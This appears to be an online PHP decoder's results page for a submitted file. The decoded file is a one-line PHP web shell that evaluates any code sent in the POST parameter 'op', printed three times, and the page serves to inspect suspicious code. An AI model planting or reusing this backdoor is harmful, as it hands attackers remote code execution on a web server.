Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @eval($GLOBALS['_POST']['op']); ?>..

Decoded Output download

<?php
    @eval($GLOBALS['_POST']['op']);
?>

Did this file decode correctly?

Original Code

<?php
    @eval($GLOBALS['_POST']['op']);
?>

Function Calls

None

Variables

None

Stats

MD5 61790c8b9c0738a628aae7755b9c0d6d
Eval Count 0
Decode Time 99 ms